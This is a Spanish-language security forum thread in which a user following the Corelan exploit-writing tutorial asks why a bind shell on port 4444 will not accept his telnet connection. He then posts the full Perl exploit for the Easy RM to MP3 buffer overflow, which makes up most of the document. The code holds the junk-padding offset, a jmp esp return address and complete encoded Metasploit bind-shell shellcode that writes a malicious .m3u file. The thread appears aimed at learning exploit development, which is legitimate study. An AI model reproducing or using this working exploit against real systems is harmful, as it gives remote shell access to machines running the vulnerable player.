Foro de elhacker.net

Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: rafael_lior en 27 Noviembre 2016, 16:36 pm



Título: Creación de Exploits 1 por corelanc0d3r
Publicado por: rafael_lior en 27 Noviembre 2016, 16:36 pm
Buenas dias, estuve leyendo el manual de creacion de  exploit de corelancoder, del capitulo me quede en ingresar una shellcode para ingresar por via telnet. sin embargo no me funciona abre el puerto pero cuando intento ingresar por putty a ese servicio telnet. no puedo.


Título: Re: Creación de Exploits 1 por corelanc0d3r
Publicado por: Zedmix en 28 Noviembre 2016, 20:24 pm
¿Has comprobado el log del servicio a ver si aparece algún error?


Título: Re: Creación de Exploits 1 por corelanc0d3r
Publicado por: rafael_lior en 30 Noviembre 2016, 19:43 pm
Justamente estaba pensando que er tema de idioma del S.O , porque para las pruebas uso un Windows XP SP3 en Español, sin embargo el exploit esta en Ingles, cuando lo cambie de idioma, me seguia presentado el mismo error, a pesar de que se abrio el puerto 4444, en modo listening, por lo que yo creo es que me falta habilitar el telnet y asi pueda ingresar , No estoy seguro con mi teoria. Espero un apoyo. Gracias.

Código
  1. # Exploit for Easy RM to MP3 27.3.700 vulnerability, discovered by Crazy_Hacker
  2. # Written by Peter Van Eeckhoutte
  3. # http://www.corelan.be
  4. # Greetings to Saumil and SK :-)
  5. #
  6. # tested on Windows XP SP3 (En)
  7. #
  8. #
  9. #
  10. my $file= "exploitrmtomp12.m3u";
  11.  
  12. my $junk= "A" x 26042;
  13. my $eip = pack('V',0x01d4f23a);  #jmp esp from MSRMCcodec02.dll
  14.  
  15. my $shellcode = "\x90" x 25;
  16.  
  17. # windows/shell_bind_tcp - 703 bytes
  18. # http://www.metasploit.com
  19. # Encoder: x86/alpha_upper
  20. # EXITFUNC=seh, LPORT=4444, RHOST=
  21. $shellcode=$shellcode."\x89\xe1\xdb\xd4\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" .
  22. "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
  23. "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
  24. "\x42\x41\x41\x42\x54\x00\x41\x51\x32\x41\x42\x32\x42\x42" .
  25. "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42" .
  26. "\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b\x4f\x4b" .
  27. "\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47" .
  28. "\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x44\x38\x45\x51\x4a" .
  29. "\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43" .
  30. "\x31\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a" .
  31. "\x4e\x46\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x44" .
  32. "\x34\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a" .
  33. "\x4b\x4a\x54\x47\x4b\x51\x44\x51\x34\x47\x58\x44\x35\x4a" .
  34. "\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c" .
  35. "\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a" .
  36. "\x4b\x44\x43\x46\x4c\x4c\x4b\x4d\x59\x42\x4c\x46\x44\x45" .
  37. "\x4c\x43\x51\x48\x43\x46\x51\x49\x4b\x45\x34\x4c\x4b\x50" .
  38. "\x43\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x42\x50\x45" .
  39. "\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51\x4e\x43\x58\x4c" .
  40. "\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43" .
  41. "\x56\x50\x53\x45\x36\x45\x38\x50\x33\x50\x32\x42\x48\x43" .
  42. "\x47\x43\x43\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50\x42" .
  43. "\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48" .
  44. "\x56\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x43" .
  45. "\x38\x43\x32\x46\x35\x43\x5a\x44\x42\x4b\x4f\x4e\x30\x42" .
  46. "\x48\x48\x59\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48" .
  47. "\x56\x46\x33\x46\x33\x46\x33\x50\x53\x50\x53\x50\x43\x51" .
  48. "\x43\x51\x53\x46\x33\x4b\x4f\x4e\x30\x43\x56\x45\x38\x42" .
  49. "\x31\x51\x4c\x42\x46\x46\x33\x4c\x49\x4d\x31\x4a\x35\x42" .
  50. "\x48\x4e\x44\x44\x5a\x44\x30\x49\x57\x50\x57\x4b\x4f\x48" .
  51. "\x56\x43\x5a\x44\x50\x50\x51\x51\x45\x4b\x4f\x4e\x30\x43" .
  52. "\x58\x49\x34\x4e\x4d\x46\x4e\x4b\x59\x50\x57\x4b\x4f\x4e" .
  53. "\x36\x50\x53\x46\x35\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x50" .
  54. "\x49\x4d\x56\x50\x49\x51\x47\x4b\x4f\x48\x56\x50\x50\x50" .
  55. "\x54\x50\x54\x46\x35\x4b\x4f\x48\x50\x4a\x33\x45\x38\x4a" .
  56. "\x47\x44\x39\x48\x46\x43\x49\x50\x57\x4b\x4f\x48\x56\x50" .
  57. "\x55\x4b\x4f\x48\x50\x42\x46\x42\x4a\x42\x44\x45\x36\x45" .
  58. "\x38\x45\x33\x42\x4d\x4d\x59\x4b\x55\x42\x4a\x46\x30\x50" .
  59. "\x59\x47\x59\x48\x4c\x4b\x39\x4a\x47\x43\x5a\x50\x44\x4b" .
  60. "\x39\x4b\x52\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x47" .
  61. "\x32\x46\x4d\x4b\x4e\x51\x52\x46\x4c\x4d\x43\x4c\x4d\x42" .
  62. "\x5a\x50\x38\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b" .
  63. "\x4e\x4e\x53\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x49" .
  64. "\x46\x51\x4b\x46\x37\x46\x32\x50\x51\x50\x51\x46\x31\x42" .
  65. "\x4a\x45\x51\x46\x31\x46\x31\x51\x45\x50\x51\x4b\x4f\x48" .
  66. "\x50\x43\x58\x4e\x4d\x4e\x39\x45\x55\x48\x4e\x51\x43\x4b" .
  67. "\x4f\x49\x46\x43\x5a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x48" .
  68. "\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43\x49\x54\x45\x34\x4b" .
  69. "\x4f\x4e\x36\x50\x52\x4b\x4f\x48\x50\x43\x58\x4c\x30\x4c" .
  70. "\x4a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x48\x56\x4b\x4f\x48" .
  71. "\x50\x41\x41";
  72.  
  73. open($FILE,">$file");
  74. print $FILE $junk.$eip.$shellcode;
  75. close($FILE);
  76. print "m3u File Created successfully\n";

Mod: Códigos van entre etiquetas GeSHi.